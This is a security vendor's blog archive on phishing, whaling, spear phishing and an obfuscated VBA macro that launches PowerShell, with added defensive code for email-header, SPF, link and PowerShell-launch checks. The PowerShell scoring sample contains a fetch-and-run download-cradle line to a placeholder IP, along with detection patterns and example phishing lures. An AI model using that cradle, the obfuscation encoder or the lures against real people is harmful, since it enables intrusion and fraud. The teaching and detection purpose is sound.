Tag Archives: phishing

What is a Whaling Attack?

A whaling attack is a spear-phishing attack aimed at a bigger target, hence the name. Where a spear-phishing attack may target any individual, a whaling attack is specific about the kind of person it goes after: one high-level executive or influencer rather than a broader group of potential victims.

Cybercriminals use whaling attacks to impersonate senior management in an organization, such as the CEO, CFO, or other executives, hoping to leverage their authority to gain access to sensitive data or money. They use the intelligence they find on the internet (and often social media) to trick employees – or another whale – into replying with financial or personal data.

These attackers want to use the authority and influence of the whale to convince people not to look at or question the fraudulent request. When employees don’t look too hard at the email address or websites and just follow directions, cybercriminals can make out like bandits.

Whaling Attack Statistics

The FBI reported that companies lost nearly $215 million in 2014 as a result of phishing attacks. In 2016, the Verizon DBIR reported 61 phishing attacks targeting finance teams. That number rose to 170 in 2017 – nearly a 200% increase!


How do Whaling Attacks Work and Why Are They Successful?

Whaling attacks demand more research and planning than standard phishing and spear-phishing attacks. To impersonate a high-value target, the attacker needs to take the time to figure out how to sound like that person, find a way to approach the intended victims, and work out what kind of information those victims can hand over.

Cybercriminals look at social media and public company information to build a profile and a plan of attack. They can also use malware and rootkits to get into the network first: an email sent from the CEO’s real, compromised account is far more convincing than one from a spoofed address. And when these emails include details that make them look like they come from trusted entities? Even better.

Email is by far the most common delivery method for phishing (whaling included): 98% of all phishing attacks use email. In the past, phishing emails relied on links or attachments carrying malware; more recently, successful whaling attacks have made a single request that seems plausible to the target, with no link or attachment for a scanner to catch.

Whaling Attack Examples

In 2016, an employee at Snapchat disclosed all of the company’s payroll data to a scammer: the employee had promptly replied to an email that appeared to come from the CEO. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data.

In another whaling attack, an employee at a commodities firm wired $17.2 million in several installments to a bank in China, as requested by what looked to be emails from the CEO. The company was planning to expand their business into China at the time, so the request seemed plausible enough.

In both of those incidents, the victim failed to identify the whaling attack or ask questions to validate the request. It’s critical to train executives and staff to be vigilant and on alert for any phishing scams.

Tips for Avoiding a Whaling Attack

Avoiding a whaling attack uses the same tactics as avoiding a standard phishing attack. The only difference is the high value of the target.


  • Educate employees about whaling attacks and how to identify phishing emails.
    • Train employees and executives to think with a security mindset and ask questions.
    • Check the Reply-To address and the actual sender address, not just the display name, and validate that both are legitimate.
    • Call to confirm unusual or urgent requests.
  • Flag all emails that come from outside of the organization – this helps highlight potential scam emails.
  • Discuss use of social media with the executive team as it relates to whale phishing.
    • Social media is a goldmine of information cybercriminals can use in their whale phishing scams.
    • Security experts recommend that members of the executive teams enable privacy restrictions on their personal social media accounts to reduce exposure of information that can be used in a social engineering scam.
  • Establish a multi-step verification process for internal and external requests for sensitive data or wire transfers.
  • Exercise data protection and data security policies: Monitor file and email activity to track and alert on suspicious behavior, and implement layered security to protect your company against whale phishing and every other kind of phishing.
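The Reply-To, external-sender and lookalike-domain checks in the list above can be automated at the mail gateway. The following is an added example, not Varonis code: it parses a raw message with Python’s standard email library and reports the header-level giveaways of an impersonation attempt. The organisation domain, the executive roster and both sample messages are constructed for illustration.

```python
"""Header checks for executive-impersonation (whaling) email.

Added example, not Varonis code. The organisation domain, the executive
roster and both sample messages are constructed for illustration.
"""
import email
from email import policy
from email.utils import parseaddr
from typing import List

ORG_DOMAIN = "example.com"   # assumed: the organisation's own mail domain
# Assumed roster of executives whose names a whaler would borrow.
EXECUTIVES = {"Jane Doe": "jane.doe@example.com"}


def _domain(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch near-miss domain labels."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_headers(raw_message: str) -> List[str]:
    """Return a list of findings for one RFC 5322 message; empty means clean."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []

    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    from_addr = from_addr.lower()
    from_dom = _domain(from_addr)

    # 1. External sender: anything not from our own domain gets flagged,
    #    which is what an "[EXTERNAL]" banner rule does at the gateway.
    if from_dom != ORG_DOMAIN:
        findings.append(f"external sender: {from_addr}")

    # 2. Display-name impersonation: the name is an executive's, but the
    #    address behind it is not that executive's real mailbox.
    for exec_name, exec_addr in EXECUTIVES.items():
        if exec_name.lower() in from_name.lower() and from_addr != exec_addr:
            findings.append(f"display name '{from_name}' does not match {exec_addr}")

    # 3. Reply-To mismatch: replies would go somewhere other than the sender.
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    if reply_addr and _domain(reply_addr) != from_dom:
        findings.append(f"Reply-To {reply_addr} differs from From domain {from_dom}")

    # 4. Lookalike domain: our label with extra text (example-corp.com,
    #    example.co) or a near miss (exarnple.com).
    org_label = ORG_DOMAIN.split(".")[0]
    from_label = from_dom.split(".")[0]
    if from_dom and from_dom != ORG_DOMAIN and (
        org_label in from_label or _edit_distance(org_label, from_label) <= 2
    ):
        findings.append(f"lookalike domain: {from_dom}")

    return findings


# Constructed sample messages (not real mail).
SPOOFED_MESSAGE = """\
From: Jane Doe <jane.doe@example-corp.com>
Reply-To: ceo.urgent@gmail.com
To: bob@example.com
Subject: Urgent wire transfer

Please process the attached wire today and keep this confidential.
"""

LEGIT_MESSAGE = """\
From: Jane Doe <jane.doe@example.com>
To: bob@example.com
Subject: Board deck

Draft attached.
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MESSAGE), ("legit", LEGIT_MESSAGE)):
        print(label, check_headers(raw) or ["clean"])
```

None of these checks is proof on its own; together they are a reason to pick up the phone, which is the multi-step verification the list recommends.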

Want to learn more? Find out how Varonis can help you prevent and defend against whaling attacks – and protect your data and your money from being stolen.

What is Spear Phishing?


According to the 2018 Verizon Data Breach Investigations Report, phishing and pretexting are the two favorite tactics employed in social engineering attacks, together accounting for 98% of social incidents and 93% of social breaches. And last year, the IRS noted a 400% surge in spear phishing against CEOs.

What is Spear Phishing?

Spear phishing is a targeted attack in which an attacker creates a fake narrative or impersonates a trusted person in order to steal credentials or information that they can then use to infiltrate your networks. It’s often an email to a targeted individual or group that appears to come from a trusted or known source.

Spear Phishing vs. Phishing

Spear phishing is a subset of phishing. The end goal is the same: steal information that gets the attacker into your network so they can take data or plant malware. The tactics, however, are different.

Phishing attacks cast a wide net: phishers are throwing hunks of bread into a lake, and they don’t care what kind of fish they catch – as long as you take the bait, they can get into the network. They’re not personalized attacks: they’re typically distributed to a wide group of people at a time, using something that looks vaguely legitimate in hopes that enough people will click on their link so that they can get more information or install malware.

Spear phishing, on the other hand, targets a specific individual or group. The attacker lures the victim by posing as a trusted or familiar source, weaving in as much personal information as possible to make the approach look legitimate.


Spear Phishing Examples

The Russian cyber espionage group Fancy Bear allegedly ran one of the more famous spear phishing campaigns, using it against the Democratic National Committee to steal emails. They first obtained an updated contact list and then targeted high-level party officials, which led them to John Podesta’s Gmail account. They stole 50,000 emails in one day, and the rest is recent history.

Fancy Bear also allegedly used spear phishing to infiltrate the Bundestag, the German federal parliament, and Emmanuel Macron’s campaign in the French election.

Spear phishing is one of the more reliable social engineering methods employed by blackhats – which is what makes the defense against spear phishing both important and challenging.

Tips for Avoiding a Spear Phishing Attack

  • Be skeptical: If you want to avoid being scammed you have to ask questions – both to the potential scammer and to yourself. As a general rule, don’t immediately comply with the first request you get. Ask a question, “why do you need that?” “What are you going to do with this data?” “No, I won’t buy you a Walmart gift card.”
  • Be aware of your online presence: Spear phishers depend on a certain amount of familiarity with their target. The more information you share with the public, the more ammunition a spear phisher has to convince you to give them something.
  • Inspect the link: Visually inspect the links in your emails by hovering over them and reading the actual destination. Scammers are good at masking URLs or making them look similar enough to trick our human brains into thinking they are ok: a lookalike domain, an extra word in the hostname or a different top-level domain are all signs of a fake.
  • Don’t click the link: Instead of clicking a link in the email, open your browser and manually navigate to the destination. A link you never clicked can’t take you to the phisher’s page, so make it a habit to go to the websites you trust directly, use https as much as possible, and use your bookmarks to keep track of your known good web destinations.
  • Be smart with your passwords: We all know a modern computer can easily crack a short password. You should be using passphrases that are at least 16 alphanumeric characters long: write it down, or use a password manager service. Change passwords regularly, and practice basic internet security to keep your data safe.
  • Keep your software updated: Security researchers and malware distributors are in an arms race, and we are caught in the middle. Security researchers do their best to update their Anti-virus and security software to match the most recent known attacks and patch vulnerabilities. Malware distributors are doing their best to find the next best hack, application, or vulnerability they can use to steal your data. As consumers, it’s important to stay up to date: patch vulnerabilities, and update security settings and software.
  • Implement a company-wide data security strategy: If 1 out of every 100 spear phishing attempts is successful, it’s more than likely that some of your data will be compromised. One compromised user can lead to lateral movement, privilege escalation, data exfiltration, and more. Implement layered security to protect against spear phishing at the enterprise level – and never underestimate the value of educating employees with security awareness training.


There are many ways to enhance your data security strategy to defend your users from phishing and spear phishing attacks. You can publish a strict SPF record for your own domain (one that ends in -all rather than ~all) and have your mail gateway enforce SPF so that a message claiming to come from a domain is checked against that domain’s list of authorized senders. Keep in mind that SPF checks the envelope sender, not the From address the user sees, which is why DKIM and DMARC belong alongside it. Implement a Data Security Platform to protect and monitor your data, and leverage security analytics to alert your team of suspicious behavior.
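To make the “strict SPF” point concrete, here is an added example (not code from this post) that evaluates a sending IP against an SPF record the way a receiving mail server does. DNS is replaced by a constructed table of TXT records so it runs offline; the domains and addresses are reserved documentation values. Only the ip4, ip6, include and all mechanisms are implemented, which is enough to show why -all and ~all behave differently for forged mail.

```python
"""Evaluate a sender IP against an SPF record, offline.

Added example, not code from the page. DNS lookups are replaced by a
constructed table of TXT records so the script runs without network access.
Only the ip4/ip6/include/all mechanisms are handled (no a/mx/ptr/exists,
no macros, no redirect modifier).
"""
import ipaddress
from typing import Dict

# Constructed TXT records standing in for DNS. The terminal mechanism is the
# point: "-all" (hard fail) is the strict setting, "~all" (soft fail) tells
# receivers to accept-but-mark, which a phisher can live with.
RECORDS: Dict[str, str] = {
    "strict.example": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailer.example -all",
    "lax.example": "v=spf1 ip4:203.0.113.0/24 ~all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 -all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(domain: str, sender_ip: str,
              records: Dict[str, str] = RECORDS, depth: int = 0) -> str:
    """Return pass / fail / softfail / neutral / none / permerror for sender_ip."""
    if depth > 10:                       # RFC 7208 caps DNS-mechanism lookups at 10
        return "permerror"
    record = records.get(domain)
    if not record or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)

    for term in record.split()[1:]:
        qualifier = "+"                  # mechanisms default to "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()

        if mech == "all":
            return QUALIFIERS[qualifier]
        if mech in ("ip4", "ip6"):
            try:
                # A v4 address is never "in" a v6 network and vice versa.
                matched = ip in ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            if matched:
                return QUALIFIERS[qualifier]
        elif mech == "include":
            # include: matches only when the referenced record says pass.
            if check_spf(arg, sender_ip, records, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        else:
            return "permerror"           # mechanism not supported by this toy evaluator
    return "neutral"                     # nothing matched and no "all" term present


if __name__ == "__main__":
    for dom, ip in (("strict.example", "192.0.2.1"), ("lax.example", "192.0.2.1")):
        print(dom, ip, "->", check_spf(dom, ip))
```

The same forged source address (192.0.2.1, which appears in neither record) gets a hard fail from strict.example and only a soft fail from lax.example; whether soft-failed mail is rejected, quarantined or delivered is then up to the receiver’s DMARC policy handling, not the SPF record.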

Want to learn more? Find out how Varonis can help prevent and defend against spear phishing attacks – and protect your data from being compromised or stolen.


The Anatomy of a Phishing Email


Have you been hooked by a phishing email?

Phishing scams are one of the most common ways hackers gain access to sensitive or confidential information. In fact, according to Verizon’s 2018 Data Breach Investigations Report, phishing is involved in 70 percent of breaches that feature a social engineering component.

What is Phishing?

At the most basic level, a phishing scam involves sending fraudulent emails that appear to be from a reputable company, with the goal of deceiving recipients into either clicking on a malicious link or downloading an infected attachment, usually to steal financial or confidential information.

If your employees don’t know the signs of a phishing email, your company is at risk. According to Verizon, the average time it took for the first victim of a large-scale phishing campaign to click on a malicious email was 16 minutes; however, it took twice as long — 33 minutes — for a user to report the phishing campaign to IT.

Given that 49 percent of malware is installed via email, these 17 minutes could spell disaster for your company.

How to Spot a Phishing Scam

We’ve broken out the most common components of a phishing email. Check out our full infographic to test your knowledge.


How many did you get? Read on to learn more about the identifying characteristics of a typical phishing email.


Subject line
Phishing campaigns typically aim to create a sense of urgency using intense language and scare tactics, starting with the email’s subject line. Common themes among phishing emails are that something sensitive, such as a credit card number or an account, has been compromised. This is done to induce the recipient into responding quickly, without recognizing the signs of a scam.

“From” field
To work, phishing campaigns must trick the email recipient into believing that the message is from a reputable company. As such, the email will appear to come from a legitimate entity within a recognized company, such as customer support. On closer inspection, however, both the display name and the sender’s actual email address are a spoof of a known brand, not a real vendor. The display name is free text under the sender’s control, so always look at the address behind it, and at the domain in that address.


“To” field
Phishing emails are often impersonal, addressing the recipient as a “user” or “customer.” This is a red flag; while businesses may send out mass eblasts announcing a sale or service, legitimate companies will address you by name when asking for an update to financial information, or dealing with a similarly sensitive matter.

Body copy
As with the subject line, the body copy of a phishing email typically employs urgent language designed to encourage the reader to act without thinking. Phishing emails are also often riddled with grammar and punctuation mistakes.


Malicious link
A suspicious link is one of the main giveaways of a phishing email. These links are often shortened (through bit.ly or a similar service) or, as above, are formatted to look like a legitimate link that corresponds with the company and message of the fake email. Hovering over the link, however, reveals a destination that doesn’t match the stated web address.
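The “hover and compare” check can be done on the raw HTML before a person ever sees the message. The script below is an added example, not part of the original post: it pulls every anchor out of an HTML body and reports links whose visible text names one site while the href points at another, links routed through a URL shortener, and links to a bare IP address. The shortener list, the sample HTML and the hostnames in it are constructed.

```python
"""Spot deceptive links in an HTML email body.

Added example, not from the page. The sample HTML is constructed. It flags
anchors whose visible text names one host while the href points elsewhere,
links routed through URL shorteners, and hosts that are raw IP addresses.
"""
import ipaddress
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly"}   # assumed list
# Visible anchor text that itself looks like a URL or hostname.
URL_LIKE = re.compile(r"^(https?://)?[\w-]+(\.[\w-]+)+(/\S*)?$", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def _registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels); fine for example.com-style hosts."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def suspicious_links(html: str) -> List[str]:
    """Return one finding per deceptive anchor; empty means nothing caught."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = _host(href)
        if not target:
            continue
        shown = _host(text) if URL_LIKE.match(text) else ""
        if shown and _registrable(shown) != _registrable(target):
            findings.append(f"text says {shown} but link goes to {target}")
        if _registrable(target) in SHORTENERS:
            findings.append(f"shortened link hides destination: {target}")
        try:
            ipaddress.ip_address(target)
            findings.append(f"raw IP address in link: {target}")
        except ValueError:
            pass
    return findings


# Constructed phishing body; the hostnames are reserved/documentation values.
SAMPLE_HTML = """
<p>Your Apple ID has been locked.</p>
<a href="http://appleid-verify.example/login">https://appleid.apple.com/</a>
<a href="http://bit.ly/3xyz">Verify now</a>
<a href="http://192.0.2.10/reset">Reset password</a>
<a href="https://www.apple.com/support">https://www.apple.com/support</a>
"""

if __name__ == "__main__":
    for line in suspicious_links(SAMPLE_HTML):
        print(line)
```

The last anchor, where the text and the href agree, produces no finding; the first three reproduce the giveaways described above.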

Scare tactics
In addition to urgent language, phishing emails often employ scare tactics in hopes that readers will click malicious links out of alarm or confusion. Such messaging is often framed around updates that are immediately required or payments that must be made within a certain amount of time.


Email sign-off
As with the email’s greeting, the sign-off is often impersonal — typically a generic customer service title, rather than a person’s name and corresponding contact information.

A phishing email’s footer often includes tell-tale signs of a fake, including an incorrect copyright date or a location that doesn’t correspond with that of the company.

Malicious attachment

In addition to malicious links, phishing scams often include malicious downloadable files, often compressed .zip files, which can infect your computer.


Malicious landing page
If you do click on a phishing link, you’ll often be taken to a malicious landing page, much like the one above. There are several ways to spot a malicious landing page:

  • Website address: The web address of a malicious landing page attempts to mimic the web address of a legitimate company, but errors such as misspellings and an insecure (non-HTTPS) connection denote an unsafe website. The reverse doesn’t hold: a padlock only means the connection is encrypted, and phishing sites can obtain certificates too, so check the domain itself.
  • Missing navigation and footer: The goal of a malicious landing site is to take your information. As such, these pages are often bare-bones. Here, you can see that the landing page is missing both the header and footer of Apple’s ID sign-in page.
  • Misspelling: Like in the phishing email, the malicious landing page will attempt to mimic a real company, but small oversights can tip you off: like above, where “Apple Pay” is misspelled as one word.
  • Information collection: The goal of phishing scams is to get you to enter personal or financial information, so malicious landing pages will almost always include some type of information collection form that deviates slightly from the company’s legitimate landing page. In the malicious page above, users are required to enter their Apple ID password; this is not required on the actual Apple ID login page.

So, were you able to spot all the errors? As phishing attacks become more common — and phishing tactics more sophisticated — it’s important to inspect all unsolicited emails with a careful eye.

Email recipients don’t shoulder all the burden, however. To truly combat phishing tactics, companies must become more vigilant, through both employee training and the use of security software, to better spot and prevent potentially debilitating attacks.

Adventures in Fileless Malware, Part III: Obfuscated VBA Scripts for Fun and Profit

After yakking in the last two posts about malware-free or fileless attack techniques, we’re ready to handle a dangerous specimen. The Hybrid Analysis site is the resource I rely on to find these malware critters. While the information that HA provides for each sample —system calls, internet traffic, etc. — should be enough to satisfy a typical IT security pro, there is some value in diving into one of these heavily obfuscated samples to see what’s actually going on.

If you’re playing along at home, I suggest doing this in an isolated sandbox, such as a throwaway cloud VM on AWS, or if you’re working on your own laptop, just make sure to comment out the system calls that launch PowerShell.

Into the Obfuscated VBA Muck

The malware I eventually found in Hybrid Analysis is a VBA script that was embedded in a Word doc. As I mentioned last time, to see the actual script, you’ll need Frank Boldewin’s OfficeMalScanner.

After extracting the script, which I gave you a peek at in the last post, I decided to load the thing into the MS Word macro library. And then, gasp, stepped through it using the built-in debugger.

My goal was to better understand the obfuscations: to play forensic analyst and experience the frustrations involved in this job.

If you’re going into one of these obfuscated scripts for the first time in a debugger, you’ll likely be gulping espressos as you make your way through the mind-numbingly complex code and stare blankly as the variable L_JEK is assigned the string “77767E6C797A6F6”.

It’s that much fun.

What I learned with this obfuscated VBA script is that only a very small part of it does any of the real work. Most of the rest is there to throw you off trail.

Since we’re getting into the nitty-gritty, I took a screen shot of the teeny part of the code that performs the true evil work of setting up the PowerShell command line that is ultimately launched by the VBA macro.

Tricky: just take the hex value and subtract 7 for the real ascii.

It’s very simple. The VBA code maintains a hex representation of the command line in a few variables and then translates it to a character string. The only “tricky” part is that hex values have been offset by 7.

So for example, the first part of the hex string comes from L_JEK (above). If you take 77 and subtract 7, you get hex 70. Do the same for 76 and you obtain hex 6F. Look these up in any ASCII table, and you’ll see they map to the first two letters of “powershell”.

This ain’t a very clever obfuscation, but it doesn’t have to be!

All it has to accomplish is getting past virus scanners searching for obvious keywords or their ascii representations.  And this particular sample does this well enough.
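Rather than decoding by hand in the debugger, the analyst’s move is to reimplement the transform. The script below is an added example, not the macro’s own code: it applies the rule described above (two hex digits per byte, each value raised by 7) to the L_JEK string as quoted on this page, whose final digit is cut off, so the dangling half byte is dropped. It also goes one step further than the post, with the inverse transform for building test strings and a brute-force search for the offset when another sample uses a different constant; that keyword-based search is a constructed heuristic, not something the macro contains.

```python
"""Decode the offset-hex strings from the obfuscated VBA macro.

Added example, not the macro's own code. Each byte of the hidden command line
is stored as two hex digits whose value has been increased by 7. The string
quoted on the page, "77767E6C797A6F6", is cut off after an odd nibble, so the
decoder ignores a trailing half byte.
"""
OFFSET = 7


def decode_offset_hex(blob: str, offset: int = OFFSET) -> str:
    """Turn 'hex digits + offset' back into the plain ASCII it hides."""
    blob = "".join(blob.split())                 # tolerate whitespace from concatenation
    blob = blob[: len(blob) - len(blob) % 2]     # drop a dangling half byte
    chars = []
    for i in range(0, len(blob), 2):
        value = int(blob[i:i + 2], 16) - offset
        if not 0 <= value < 128:
            raise ValueError(f"byte {blob[i:i + 2]!r} at {i} is not offset ASCII")
        chars.append(chr(value))
    return "".join(chars)


def encode_offset_hex(text: str, offset: int = OFFSET) -> str:
    """Inverse of decode_offset_hex, i.e. what the macro author's packer did."""
    return "".join(f"{ord(c) + offset:02X}" for c in text)


def guess_offset(blob: str, must_contain: str = "powershell") -> int:
    """Brute-force the offset when a sample uses a different constant.

    Constructed heuristic: try 0..255 and return the first offset whose decode
    contains the expected keyword. A real macro may use another transform.
    """
    for off in range(256):
        try:
            if must_contain in decode_offset_hex(blob, off).lower():
                return off
        except ValueError:
            continue
    raise ValueError("no single-byte offset yields the keyword")


if __name__ == "__main__":
    # The page's own truncated variable decodes to the start of "powershell".
    print(decode_offset_hex("77767E6C797A6F6"))          # powersh
    sample = encode_offset_hex("powershell.exe -w hidden", 13)
    print(guess_offset(sample), decode_offset_hex(sample, guess_offset(sample)))
```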

Finally, after the code builds the command line, it then launches it through the CreateProcess function (below).

Either comment out system calls or set a breakpoint before it.

Think about it. A Word doc was sent in a phish mail to an employee. When the doc is opened, this VBA script automatically launches a PowerShell session to start the next phase of the attack. No binaries involved, and the heavily obfuscated scripts will evade scanners.


To further my own education, I pulled out another macro from Hybrid Analysis (below) just to see what else is out there. This second one effectively does the same thing as the code above.

Secret code embedded in VBA.

It’s a little more clever in how it builds the command line. There’s a decode function, called “d”, that filters out characters from a base string by comparing against a secondary string.

It’s a high-school level idea, but it gets the job done: it will evade scanners and fool IT folks who are quickly looking at any logs for unusual activities.

Next Stop

In my first series of posts on obfuscation, I showed that Windows Event logging captures enough details of PowerShell sessions (if you enable the appropriate modules, such as module and script block logging) to do a deep analysis after the fact.

Of course, the brilliance of fileless attacks is that it’s hard to tell whether a PowerShell script is doing anything evil at run time just by parsing the command line you find in the event logs.


PowerShell sessions are being launched all the time, and one hacker’s PowerShell poison can be close to another IT admin’s PowerShell power tool. So if you want to alert every time a script downloads something from the Internet, you’ll be sending out too many false positives.
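One way out of the false-positive trap is to score the launch by its context rather than by any single keyword: who started PowerShell, from which parent process, and how often that user runs it at all. The following is an added example, not Varonis code. The records are constructed in the shape of Sysmon Event ID 1 / Windows 4688 fields (user, parent image, image, command line), and the per-user launch counts stand in for the history a UBA system would keep; the weights are assumptions chosen to make an Office-spawned, encoded, hidden-window PowerShell score high while an admin’s ordinary download scores low.

```python
"""Score PowerShell process-creation events by context, not by keyword alone.

Added example, not Varonis code. The records below are constructed in the
shape of Sysmon Event ID 1 / Windows 4688 fields; the per-user history of
PowerShell launches stands in for the baseline a UBA system would keep.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression|net\.webclient",
    re.I,
)


@dataclass
class ProcessEvent:
    user: str
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line: str) -> str:
    """Expand -EncodedCommand/-enc (base64 of UTF-16LE) so the real script is scored."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return command_line
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line


def score_event(ev: ProcessEvent, history: Dict[str, int]) -> int:
    """Return a 0-100 risk score; history maps user -> prior PowerShell launches."""
    if ev.image.lower() not in SCRIPT_HOSTS:
        return 0
    score = 0
    script = decode_encoded_command(ev.command_line)
    cl = ev.command_line.lower()

    if ev.parent_image.lower() in OFFICE_APPS:
        score += 50                       # Word/Excel should never spawn a shell
    if re.search(r"-e(nc|ncodedcommand)?\s", cl):
        score += 15                       # encoded payload
    if re.search(r"-w(indowstyle)?\s+hidden", cl):
        score += 10                       # hidden window
    if "-nop" in cl or "-noprofile" in cl:
        score += 5
    if DOWNLOAD_CRADLE.search(script):
        score += 15                       # a download alone is noisy; see the text above
    if history.get(ev.user, 0) < 5:
        score += 15                       # this user hardly ever runs PowerShell
    return min(score, 100)


def alerts(events: List[ProcessEvent], history: Dict[str, int], threshold: int = 50) -> List[str]:
    """Users whose events reach the threshold; routine admin usage stays quiet."""
    return [ev.user for ev in events if score_event(ev, history) >= threshold]


# Constructed sample data: a macro-spawned download cradle and two admin launches.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/a.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
EVENTS = [
    ProcessEvent("alice", "winword.exe", "powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ProcessEvent("admin.bob", "explorer.exe", "powershell.exe",
                 "powershell.exe -File C:\\scripts\\patch.ps1"),
    ProcessEvent("admin.bob", "cmd.exe", "powershell.exe",
                 "powershell.exe Invoke-WebRequest https://updates.example/patch.msi -OutFile patch.msi"),
]
HISTORY = {"alice": 0, "admin.bob": 340}   # prior PowerShell launches per user

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev.user, ev.parent_image, score_event(ev, HISTORY))
    print("alerts:", alerts(EVENTS, HISTORY))
```

The admin’s Invoke-WebRequest trips the download indicator and nothing else, so it stays below the threshold; the same indicator inside an encoded command spawned by winword.exe for a user with no PowerShell history lands at the top of the scale.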

Of course, this leads to this blog’s favorite topic: the failure of perimeter defenses to stop phishing and FUD malware, and the power of User Behavior Analytics.

In short: it’s a losing battle trying to stop hackers from getting past perimeter defenses. The better strategy is to spot unusual file access and application behaviors, and then respond by de-activating accounts or taking another breach response measure.

That’s enough preaching for the day. In the next post, we’ll take a closer look at more advanced types of fileless attacks.


I Click Therefore I Exist: Disturbing Research On Phishing


Homo sapiens click on links in clunky, non-personalized phish mails. They just do. We’ve seen research suggesting a small percentage are simply wired to click during their online interactions. Until recently, the “why” behind most people’s clicking behaviors remained something of a mystery. We now have more of an answer to this question based on findings from German academics. Warning:  IT security people will not find their conclusions very comforting.

Attention Marketers: High Click-Through Rates!

According to research by Zinaida Benenson and her colleagues, the reasons for clicking on phish bait are based on an overall curiosity factor, and then secondarily, on content that connects in some way to the victim.

The research group used the following email template in the experiment, and sent it to over 1200 students at two different universities:


The New Year’s Eve party was awesome! Here are the pictures:

http://<IP address>/photocloud/page.php?h=<participant ID>

But please don’t share them with people who have not been there!

See you next time!

<sender’s first name>

The message, by the way, was blasted out during the first week of January.

Anybody want to guess what was the overall click-through rate for this spammy message?

A blazing 25%.

Marketers everywhere are officially jealous of this awesome metric.

Anyway, the German researchers followed up with survey questions to find the motivations behind these click-aholics.

Of those who responded to the survey, 34% said they were curious about the party pictures linked to in the mail, another 27% said the message fits the time of year, and another 16% said they thought they knew the sender based on just the first name.

To paraphrase one of those cat memes, “Humans is EZ to fool!”

The clever German researchers conducted a classic cover-story design in their experiment. They enlisted students to ostensibly participate in a study on Internet habits and offered online shopping vouchers as an incentive. Nothing was mentioned about phish mails being sent to them.

And yes, after the real study on phishing was completed, the student subjects were told the reason for the research, the results, and given a good stern warning about not clicking on silly phish mail links.

Benenson also gave a talk on her research at last year’s Black Hat. It’s well-worth your time.

Phishing: The Ugly Truth

At the IOS blog, we’ve also been writing about phishing and have been following the relevant research. In short: we can’t say we’re surprised by the findings of the German team, especially as it relates to clicking on links to pictures.

The German study seems to confirm our own intuitions: people at corporate jobs are bored and are finding cheap thrills by gazing into the private lives of strangers.

Ok, you can’t change human nature, etc.

But there’s another, more disturbing conclusion related to the general context of the message. The study strongly suggests that the more you know and can say about the target in the phish mail, the more likely it is that they will click. In fact, in an earlier study by Benenson, a 56% click rate was achieved when the phish mail recipient was addressed by name.

Here’s what they had to say about their latest research:

 … fitting the content and the context of the message to the current life situation of a person plays an important role. Many people did not click because they learned to avoid messages from unknown senders, or with an unexpected content  … For some participants, however, the same heuristic (‘does this message fit my current situation?’) led to the clicks, as they thought that the message might be from a person from their New Year’s Eve party, or that they might know the sender.


Implications for Data Security

At Varonis, we’ve been preaching the message that you can’t expect perimeter security to be your last line of defense. Phishing, of course, is one of the major reasons why hackers find it so easy to get inside the corporate intranet.

But hackers are getting smarter all the time, collecting more details about their phishing targets to make the lure more attractive. The German research shows that even poorly personalized content is very effective.

So imagine what happens if they gain actual personal preference and other informational details from observing victims on social media sites or, perhaps, through a previous hack of another web site you engage with.

Maybe a smart hacker who’s been stalking me might send this fiendish email to my Varonis account:

Hey Andy,

Sorry I didn’t see you Black Hat this year! I ran into your colleague Cindy Ng, and she said you’d really be interested in research I’m doing on phishing and user behavior analytics. Click on this link and let me know what you think.  Hope things are going well at Varonis!


Bob Simpson, CEO of Phishing Analytics

Hmmm, you know I could fall for something like this the next time I’m in a vulnerable state.

